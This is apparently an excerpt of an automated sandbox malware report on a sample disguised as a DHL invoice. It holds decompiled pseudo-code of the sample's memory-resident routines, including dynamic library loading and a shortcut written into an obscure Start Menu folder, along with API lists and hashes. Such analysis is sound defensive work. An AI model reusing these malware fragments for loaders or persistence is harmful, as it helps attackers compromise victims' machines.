												 *__ecx =  *__ecx & 0x00000000;
												__eax = E7411122C(_v24);
												__ebx = __eax;
												goto L94;
											}
											L129:
											__eflags = __ax;
											if(__ax == 0) {
												goto L133;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L129;
											}
											goto L128;
										}
									case 1:
										_v8 = 1;
										goto L54;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L54;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L82;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L54;
										}
										_v12 = _v12 - 2;
										__ebx = E7411121B();
										 &_v12 = E74111AEA( &_v12);
										__eax = E74111470(__edx, __eax, __edx, __ebx);
										goto L94;
									case 5:
										L102:
										_v20 = _v20 + 1;
										goto L54;
									case 6:
										_push(7);
										goto L120;
									case 7:
										_push(0x19);
										goto L140;
									case 8:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L104;
									case 9:
										_push(0x15);
										goto L140;
									case 0xa:
										_push(0x16);
										goto L140;
									case 0xb:
										_push(0x18);
										goto L140;
									case 0xc:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L115;
									case 0xd:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L106;
									case 0xe:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L108;
									case 0xf:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L119;
									case 0x10:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L110;
									case 0x11:
										_push(3);
										goto L120;
									case 0x12:
										_push(0x17);
										L140:
										_pop(__ebx);
										goto L95;
									case 0x13:
										__eax =  &_v12;
										__eax = E74111AEA( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L94;
									case 0x14:
										__ebx = 0xffffffff;
										goto L95;
									case 0x15:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L113;
									case 0x16:
										__ecx = 0;
										__eflags = 0;
										goto L88;
									case 0x17:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L117;
									case 0x18:
										_t262 =  *(_t320 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L82:
											_v40 = 1;
										}
										goto L54;
									case 0x19:
										L104:
										__ecx = 0;
										_v8 = 2;
										__ecx = 1;
										goto L88;
									case 0x1a:
										L115:
										_push(5);
										goto L120;
									case 0x1b:
										L106:
										__ecx = 0;
										_v8 = 3;
										__ecx = 1;
										goto L88;
									case 0x1c:
										L108:
										__ecx = 0;
										__ecx = 1;
										goto L88;
									case 0x1d:
										L119:
										_push(6);
										goto L120;
									case 0x1e:
										L110:
										_push(2);
										goto L120;
									case 0x1f:
										__eax =  &_v12;
										__eax = E74111AEA( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										goto L94;
									case 0x20:
										L113:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__ecx);
										goto L88;
									case 0x21:
										L117:
										_push(4);
										L120:
										_pop(__ecx);
										L88:
										__edi = _v16;
										__edx =  *(0x7411305c + __ecx * 4);
										__eax =  ~__eax;
										asm("sbb eax, eax");
										_v40 = 1;
										__edi = _v16 << 5;
										__eax = __eax & 0x00008000;
										__edi = (_v16 << 5) + __esi;
										__eax = __eax | __ecx;
										__eflags = _v8;
										 *(__edi + 0x1018) = __eax;
										if(_v8 < 0) {
											L90:
											__edx = 0;
											__edx = 1;
											__eflags = 1;
											L91:
											__eflags = _v8 - 1;
											 *(__edi + 0x1028) = __edx;
											if(_v8 == 1) {
												__eax =  &_v12;
												__eax = E74111AEA( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t132 = _v16 + 0x81; // 0x81
											_t132 = _t132 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t132 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											L94:
											__eflags = __ebx;
											if(__ebx == 0) {
												goto L54;
											}
											L95:
											__eflags = _v20;
											_v40 = 1;
											if(_v20 != 0) {
												L100:
												__eflags = _v20 - 1;
												if(_v20 == 1) {
													__eax = _v16;
													__eax = _v16 << 5;
													__eflags = __eax;
													 *(__eax + __esi + 0x102c) = __ebx;
												}
												goto L102;
											}
											_v16 = _v16 << 5;
											_t140 = __esi + 0x1030; // 0x1030
											__edi = (_v16 << 5) + _t140;
											__eax =  *__edi;
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L98:
												__eax = GlobalFree(__eax);
												L99:
												 *__edi = __ebx;
												goto L100;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L99;
											}
											goto L98;
										}
										__eflags = __edx;
										if(__edx > 0) {
											goto L91;
										}
										goto L90;
									case 0x22:
										goto L54;
								}
							}
							_t263 = _t260 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t274;
								goto L77;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L154;
							}
							__eflags = _t277 - 0x6e;
							if(__eflags > 0) {
								_t298 = _t277 - 0x72;
								__eflags = _t298;
								if(_t298 == 0) {
									_push(4);
									L71:
									_pop(_t265);
									L72:
									__eflags = _v8 - 1;
									if(_v8 != 1) {
										_t92 = _t320 + 0x1010;
										 *_t92 =  *(_t320 + 0x1010) &  !_t265;
										__eflags =  *_t92;
									} else {
										 *(_t320 + 0x1010) =  *(_t320 + 0x1010) | _t265;
									}
									_v8 = 1;
									goto L54;
								}
								_t301 = _t298 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									_push(0x10);
									goto L71;
								}
								__eflags = _t301 != 0;
								if(_t301 != 0) {
									goto L54;
								}
								_push(0x40);
								goto L71;
							}
							if(__eflags == 0) {
								_push(8);
								goto L71;
							}
							_t304 = _t277 - 0x21;
							__eflags = _t304;
							if(_t304 == 0) {
								_v8 =  ~_v8;
								goto L54;
							}
							_t305 = _t304 - 0x11;
							__eflags = _t305;
							if(_t305 == 0) {
								_t265 = 0x100;
								goto L72;
							}
							_t306 = _t305 - 0x31;
							__eflags = _t306;
							if(_t306 == 0) {
								_t265 = 1;
								goto L72;
							}
							__eflags = _t306 != 0;
							if(_t306 != 0) {
								goto L54;
							}
							_push(0x20);
							goto L71;
						}
						goto L15;
					}
					_t268 = _t250 - 5;
					if(_t268 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t274;
						_v20 = _t274;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t274;
						goto L17;
					}
					_t272 = _t268 - 1;
					if(_t272 == 0) {
						_v32 = 2;
						_v8 = _t274;
						_v20 = _t274;
						goto L17;
					}
					if(_t272 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t320 == _t274 ||  *(_t320 + 0x100c) != _t274) {
					L174:
					return _t320;
				} else {
					_t217 =  *_t320 - 1;
					if(_t217 == 0) {
						_t179 = _t320 + 8; // 0x8
						_t313 = _t179;
						__eflags =  *_t313 - _t274;
						if( *_t313 != _t274) {
							_t218 = GetModuleHandleW(_t313);
							__eflags = _t218 - _t274;
							 *(_t320 + 0x1008) = _t218;
							if(_t218 != _t274) {
								L163:
								_t184 = _t320 + 0x808; // 0x808
								_t314 = _t184;
								_t219 = E74111621( *(_t320 + 0x1008), _t314);
								__eflags = _t219 - _t274;
								 *(_t320 + 0x100c) = _t219;
								if(_t219 == _t274) {
									__eflags =  *_t314 - 0x23;
									if( *_t314 == 0x23) {
										_t187 = _t320 + 0x80a; // 0x80a
										_t223 = E74111311(_t187);
										__eflags = _t223 - _t274;
										if(_t223 != _t274) {
											__eflags = _t223 & 0xffff0000;
											if((_t223 & 0xffff0000) == 0) {
												 *(_t320 + 0x100c) = GetProcAddress( *(_t320 + 0x1008), _t223 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t274;
								if(_v48 != _t274) {
									L170:
									_t314[lstrlenW(_t314)] = 0x57;
									_t221 = E74111621( *(_t320 + 0x1008), _t314);
									__eflags = _t221 - _t274;
									if(_t221 != _t274) {
										L158:
										 *(_t320 + 0x100c) = _t221;
										goto L174;
									}
									__eflags =  *(_t320 + 0x100c) - _t274;
									L172:
									if(__eflags != 0) {
										goto L174;
									}
									L173:
									_t198 = _t320 + 4;
									 *_t198 =  *(_t320 + 4) | 0xffffffff;
									__eflags =  *_t198;
									goto L174;
								} else {
									__eflags =  *(_t320 + 0x100c) - _t274;
									if( *(_t320 + 0x100c) != _t274) {
										goto L174;
									}
									goto L170;
								}
							}
							_t226 = LoadLibraryW(_t313);
							__eflags = _t226 - _t274;
							 *(_t320 + 0x1008) = _t226;
							if(_t226 == _t274) {
								goto L173;
							}
							goto L163;
						}
						_t180 = _t320 + 0x808; // 0x808
						_t228 = E74111311(_t180);
						 *(_t320 + 0x100c) = _t228;
						__eflags = _t228 - _t274;
						goto L172;
					}
					_t229 = _t217 - 1;
					if(_t229 == 0) {
						_t177 = _t320 + 0x808; // 0x808
						_t230 = _t177;
						__eflags =  *_t230 - _t274;
						if( *_t230 == _t274) {
							goto L174;
						}
						_t221 = E74111311(_t230);
						L157:
						goto L158;
					}
					if(_t229 != 1) {
						goto L174;
					}
					_t77 = _t320 + 8; // 0x8
					_t275 = _t77;
					_t315 = E74111311(_t77);
					 *(_t320 + 0x1008) = _t315;
					if(_t315 == 0) {
						goto L173;
					}
					 *(_t320 + 0x104c) =  *(_t320 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t320 + 0x1050)) = E7411122C(_t275);
					 *(_t320 + 0x103c) =  *(_t320 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t320 + 0x1048)) = 1;
					 *((intOrPtr*)(_t320 + 0x1038)) = 1;
					_t86 = _t320 + 0x808; // 0x808
					_t221 =  *(_t315->i + E74111311(_t86) * 4);
					goto L157;
				}
			}

0x74111b6b
0x74111b6e
0x74111b71
0x74111b74
0x74111b77
0x74111b7a
0x74111b7d
0x74111b7f
0x74111b82
0x74111b87
0x74111b8a
0x74111b92
0x74111b9a
0x74111b9c
0x74111b9f
0x74111ba7
0x74111ba7
0x74111bac
0x74111baf
0x00000000
0x00000000
0x74111bb9
0x74111bbc
0x74111bc1
0x74111bc3
0x74111c36
0x74111c36
0x74111c36
0x74111c3a
0x74111c3d
0x74111c3f
0x74111c61
0x74111c63
0x74111c66
0x74111c75
0x74111c77
0x74111c7d
0x74111c7d
0x74111c83
0x74111c86
0x74111c86
0x74111c89
0x74111c89
0x74111c8f
0x74111c91
0x74111c91
0x74111c93
0x74111c96
0x74111c99
0x74111c9f
0x74111ca5
0x74111ca8
0x74111ccc
0x74111ccf
0x00000000
0x00000000
0x74111cd2
0x74111cd4
0x74111ce2
0x74111ce5
0x74111ce7
0x00000000
0x00000000
0x00000000
0x00000000
0x74111ce9
0x74111ce9
0x74111ce9
0x74111cef
0x74111cf1
0x00000000
0x00000000
0x74111cf3
0x74111cf5
0x74111cf7
0x74111cf9
0x00000000
0x00000000
0x00000000
0x74111cf9
0x74111cfb
0x74111cfd
0x74111cff
0x74111cff
0x74111d05
0x74111d0b
0x74111d0d
0x74111d21
0x74111d21
0x74111d23
0x74111d0f
0x74111d15
0x74111d18
0x74111d18
0x00000000
0x74111caa
0x74111caa
0x74111caa
0x74111cab
0x74111cb3
0x74111cb7
0x74111cbd
0x74111cc1
0x74111d29
0x74111d2c
0x74111d30
0x74111da3
0x74111da7
0x74111ba4
0x00000000
0x74111ba4
0x00000000
0x74111da7
0x74111cad
0x74111cad
0x74111cae
0x00000000
0x00000000
0x74111cb0
0x74111cb1
0x00000000
0x00000000
0x00000000
0x74111cb1
0x74111ca8
0x74111c42
0x00000000
0x00000000
0x74111c4b
0x74111c4e
0x74111c5b
0x74111c5b
0x74111c50
0x00000000
0x74111c50
0x74111bc5
0x74111bc8
0x74111c19
0x74111c1c
0x74111c2e
0x74111c2e
0x74111c31
0x00000000
0x74111c31
0x74111c1e
0x74111c23
0x00000000
0x00000000
0x74111c25
0x74111c28
0x74111d35
0x74111d38
0x74111d38
0x74111d3a
0x741120f0
0x741120f3
0x7411215a
0x74111d93
0x74111d96
0x74111d99
0x74111d9c
0x74111d9c
0x74111d9e
0x74111d9f
0x74111d9f
0x74111da0
0x00000000
0x74111da0
0x741120f5
0x741120f8
0x741120ff
0x741120ff
0x74112103
0x74112117
0x74112117
0x7411211a
0x7411211e
0x74112166
0x74112169
0x7411216d
0x00000000
0x7411216d
0x74112120
0x74112124
0x00000000
0x00000000
0x74112126
0x7411212d
0x7411212d
0x74112133
0x74112136
0x74112152
0x74112138
0x74112141
0x74112144
0x74112144
0x00000000
0x74112136
0x74112105
0x74112108
0x7411210c
0x00000000
0x00000000
0x7411210e
0x00000000
0x7411210e
0x741120fa
0x741120fd
0x00000000
0x00000000
0x00000000
0x741120fd
0x74111d40
0x74111d40
0x74111d41
0x74111e8b
0x74111e8b
0x74111e92
0x74111e95
0x00000000
0x00000000
0x74111ea2
0x00000000
0x7411208d
0x74112090
0x74112093
0x74112093
0x74112094
0x74112095
0x74112098
0x7411209b
0x7411209e
0x00000000
0x00000000
0x741120a0
0x741120a0
0x741120a4
0x741120bc
0x741120bf
0x741120c3
0x741120c9
0x00000000
0x741120c9
0x741120a6
0x741120a6
0x741120a9
0x00000000
0x00000000
0x741120ab
0x741120ae
0x741120b0
0x741120b1
0x741120b1
0x741120b1
0x741120b2
0x741120b5
0x741120b8
0x741120b9
0x74112093
0x74112094
0x74112095
0x74112098
0x7411209b
0x7411209e
0x00000000
0x00000000
0x00000000
0x7411209e
0x00000000
0x74111ee9
0x00000000
0x00000000
0x74111ef5
0x00000000
0x00000000
0x74111edc
0x74111ee0
0x74111ee4
0x00000000
0x00000000
0x7411205e
0x74112062
0x00000000
0x00000000
0x74112068
0x74112071
0x74112078
0x74112080
0x00000000
0x00000000
0x74111fc5
0x74111fc5
0x00000000
0x00000000
0x74111efe
0x00000000
0x00000000
0x741120e8
0x00000000
0x00000000
0x74111fcd
0x74111fcf
0x74111fcf
0x00000000
0x00000000
0x741120d8
0x00000000
0x00000000
0x741120dc
0x00000000
0x00000000
0x741120e4
0x00000000
0x00000000
0x74112015
0x74112017
0x74112017
0x00000000
0x00000000
0x74111fdf
0x74111fe1
0x74111fe1
0x00000000
0x00000000
0x74111ff1
0x74111ff3
0x74111ff3
0x00000000
0x00000000
0x74112023
0x74112025
0x74112025
0x00000000
0x00000000
0x74111ffc
0x74111ffe
0x74111ffe
0x00000000
0x00000000
0x74112003
0x00000000
0x00000000
0x741120e0
0x741120ea
0x741120ea
0x00000000
0x00000000
0x7411202e
0x74112032
0x74112037
0x7411203a
0x7411203b
0x7411203e
0x74112044
0x74112044
0x00000000
0x00000000
0x741120d0
0x00000000
0x00000000
0x74112007
0x74112009
0x74112009
0x00000000
0x00000000
0x74111f05
0x74111f05
0x00000000
0x00000000
0x7411201c
0x7411201e
0x7411201e
0x00000000
0x00000000
0x74111ea9
0x74111eaf
0x74111eb2
0x74111eb4
0x74111eb4
0x74111eb7
0x74111ebb
0x74111ec8
0x74111eca
0x74111ed0
0x74111ed0
0x74111ed0
0x00000000
0x00000000
0x74111fd0
0x74111fd0
0x74111fd2
0x74111fd9
0x00000000
0x00000000
0x74112018
0x74112018
0x00000000
0x00000000
0x74111fe2
0x74111fe2
0x74111fe4
0x74111feb
0x00000000
0x00000000
0x74111ff4
0x74111ff4
0x74111ff6
0x00000000
0x00000000
0x74112026
0x74112026
0x00000000
0x00000000
0x74111fff
0x74111fff
0x00000000
0x00000000
0x7411204c
0x74112050
0x74112055
0x74112058
0x00000000
0x00000000
0x7411200a
0x7411200a
0x7411200d
0x7411200f
0x00000000
0x00000000
0x7411201f
0x7411201f
0x74112028
0x74112028
0x74111f07
0x74111f07
0x74111f0a
0x74111f11
0x74111f13
0x74111f15
0x74111f1c
0x74111f1f
0x74111f24
0x74111f26
0x74111f28
0x74111f2c
0x74111f32
0x74111f38
0x74111f38
0x74111f3a
0x74111f3a
0x74111f3b
0x74111f3b
0x74111f3f
0x74111f45
0x74111f47
0x74111f4b
0x74111f50
0x74111f50
0x74111f52
0x74111f52
0x74111f55
0x74111f58
0x74111f61
0x74111f67
0x74111f6a
0x74111f6a
0x74111f6c
0x74111f6f
0x74111f75
0x74111f7b
0x74111f7b
0x74111f7d
0x00000000
0x00000000
0x74111f83
0x74111f83
0x74111f87
0x74111f8e
0x74111fb2
0x74111fb2
0x74111fb6
0x74111fb8
0x74111fbb
0x74111fbb
0x74111fbe
0x74111fbe
0x00000000
0x74111fb6
0x74111f93
0x74111f96
0x74111f96
0x74111f9d
0x74111f9f
0x74111fa2
0x74111fa9
0x74111faa
0x74111fb0
0x74111fb0
0x00000000
0x74111fb0
0x74111fa4
0x74111fa7
0x00000000
0x00000000
0x00000000
0x74111fa7
0x74111f34
0x74111f36
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x74111ea2
0x74111d47
0x74111d47
0x74111d48
0x74111e88
0x00000000
0x74111e88
0x74111d4e
0x74111d4f
0x00000000
0x00000000
0x74111d55
0x74111d58
0x74111e4d
0x74111e4d
0x74111e50
0x74111e65
0x74111e67
0x74111e67
0x74111e68
0x74111e6b
0x74111e6e
0x74111e7a
0x74111e7a
0x74111e7a
0x74111e70
0x74111e70
0x74111e70
0x74111e80
0x00000000
0x74111e80
0x74111e52
0x74111e52
0x74111e53
0x74111e61
0x00000000
0x74111e61
0x74111e56
0x74111e57
0x00000000
0x00000000
0x74111e5d
0x00000000
0x74111e5d
0x74111d5e
0x74111e49
0x00000000
0x74111e49
0x74111d64
0x74111d64
0x74111d67
0x74111d90
0x00000000
0x74111d90
0x74111d69
0x74111d69
0x74111d6c
0x74111d86
0x00000000
0x74111d86
0x74111d6e
0x74111d6e
0x74111d71
0x74111d80
0x00000000
0x74111d80
0x74111d74
0x74111d75
0x00000000
0x00000000
0x74111d77
0x00000000
0x74111d77
0x00000000
0x74111c28
0x74111bca
0x74111bcd
0x74111bfc
0x74111c00
0x74111c07
0x74111c0e
0x74111c11
0x74111c14
0x00000000
0x74111c14
0x74111bcf
0x74111bd0
0x74111beb
0x74111bf2
0x74111bf5
0x00000000
0x74111bf5
0x74111bd5
0x00000000
0x74111bdb
0x74111bdb
0x74111be2
0x00000000
0x74111be2
0x74111bd5
0x74111db6
0x74111dbb
0x74111dc0
0x74111dc4
0x7411226d
0x74112273
0x74111dd6
0x74111dd8
0x74111dd9
0x74112196
0x74112196
0x74112199
0x7411219c
0x741121b9
0x741121bf
0x741121c1
0x741121c7
0x741121de
0x741121de
0x741121de
0x741121eb
0x741121f1
0x741121f4
0x741121fa
0x741121fc
0x74112200
0x74112202
0x74112209
0x7411220e
0x74112211
0x74112213
0x74112218
0x7411222a
0x7411222a
0x74112218
0x74112211
0x74112200
0x74112230
0x74112233
0x7411223d
0x74112245
0x74112252
0x74112258
0x7411225b
0x7411218b
0x7411218b
0x00000000
0x7411218b
0x74112261
0x74112267
0x74112267
0x00000000
0x00000000
0x74112269
0x74112269
0x74112269
0x74112269
0x00000000
0x74112235
0x74112235
0x7411223b
0x00000000
0x00000000
0x00000000
0x7411223b
0x74112233
0x741121ca
0x741121d0
0x741121d2
0x741121d8
0x00000000
0x00000000
0x00000000
0x741121d8
0x7411219e
0x741121a5
0x741121ab
0x741121b1
0x00000000
0x741121b1
0x74111ddf
0x74111de0
0x74112175
0x74112175
0x7411217b
0x7411217e
0x00000000
0x00000000
0x74112185
0x7411218a
0x00000000
0x7411218a
0x74111de7
0x00000000
0x00000000
0x74111ded
0x74111ded
0x74111df6
0x74111dfb
0x74111e01
0x00000000
0x00000000
0x74111e07
0x74111e14
0x74111e1a
0x74111e24
0x74111e2a
0x74111e32
0x74111e42
0x00000000
0x74111e42

APIs

Part of subcall function 7411121B: GlobalAlloc.KERNEL32(00000040,?,7411123B,?,741112DF,00000019,741111BE,-000000A0), ref: 74111225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 74111C6F
lstrcpyW.KERNEL32(00000008,?), ref: 74111CB7
lstrcpyW.KERNEL32(00000808,?), ref: 74111CC1
GlobalFree.KERNEL32(00000000), ref: 74111CD4
GlobalFree.KERNEL32(?), ref: 74111DB6
GlobalFree.KERNEL32(?), ref: 74111DBB
GlobalFree.KERNEL32(?), ref: 74111DC0
GlobalFree.KERNEL32(00000000), ref: 74111FAA
lstrcpyW.KERNEL32(?,?), ref: 74112144
GetModuleHandleW.KERNEL32(00000008), ref: 741121B9
LoadLibraryW.KERNEL32(00000008), ref: 741121CA
GetProcAddress.KERNEL32(?,?), ref: 74112224
lstrlenW.KERNEL32(00000808), ref: 7411223E

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 88dac3e59c53f6d6421f0def9469d2b3a3abb95387d6606e1d7824083318c36e
Instruction ID: a85b061e8d0fc72cc05f84b759dd164f8344560232f510d1a41acaf07af1ca25
Opcode Fuzzy Hash: 88dac3e59c53f6d6421f0def9469d2b3a3abb95387d6606e1d7824083318c36e
Instruction Fuzzy Hash: EF22B971E1464BDADB12EFA5C9C46EEF7B1FB08305F1245BAD196E2580E7709B80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0327ECA5 Relevance: 4.0, Strings: 3, Instructions: 214COMMON

Download Yara Rule

Strings

6Ifw, xrefs: 0327EE1F
1],+, xrefs: 0327ED52
6Ifw, xrefs: 0327EE24

Memory Dump Source

Source File: 00000001.00000002.17985889922.0000000003279000.00000040.00000800.00020000.00000000.sdmp, Offset: 03279000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3279000_DHL-INVOICE-MBV.jbxd

Yara matches

Similarity

API ID:
String ID: 1],+$6Ifw$6Ifw
API String ID: 0-2713723450
Opcode ID: 71f5fd64cc80dd2f0811c38cb03191c23a7fe1318dd9dbf8e2e6e8018267b11b
Instruction ID: 90ec1f5dd25ec6b61a4de372b2257db49e924e254a3369b8df7520e88547ea63
Opcode Fuzzy Hash: 71f5fd64cc80dd2f0811c38cb03191c23a7fe1318dd9dbf8e2e6e8018267b11b
Instruction Fuzzy Hash: 9971747160034A9FDB24EF25CC587DA7BB6BF86310F61816DDC898F295C3328A82CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C41(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C41(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C41(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C41(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C41(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BD0( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C41(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical\\Mystificerede5\\Montia\\Sbeskummet\\Gtevielsers22");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x0040210d
0x00402117
0x00402121
0x0040212b
0x00402136
0x00402139
0x00402153
0x00402156
0x0040215c
0x0040215f
0x00402169
0x0040216d
0x0040216d
0x00402172
0x00402183
0x0040218b
0x00402242
0x00402242
0x00402249
0x00402191
0x00402191
0x004021a0
0x004021a4
0x004021a7
0x004021ad
0x004021bb
0x004021be
0x004021c0
0x004021cb
0x004021cb
0x004021d0
0x004021d2
0x004021d9
0x004021d9
0x004021dc
0x004021e5
0x004021e8
0x004021ee
0x004021f0
0x004021fa
0x004021fa
0x004021fd
0x00402206
0x00402209
0x00402212
0x00402218
0x0040221a
0x00402228
0x00402228
0x0040222b
0x00402231
0x00402231
0x00402234
0x0040223a
0x00402240
0x00402255
0x00000000
0x00000000
0x00000000
0x00402240
0x0040224b
0x00402ac8
0x00402ad4

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical\Mystificerede5\Montia\Sbeskummet\Gtevielsers22, xrefs: 004021C3

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
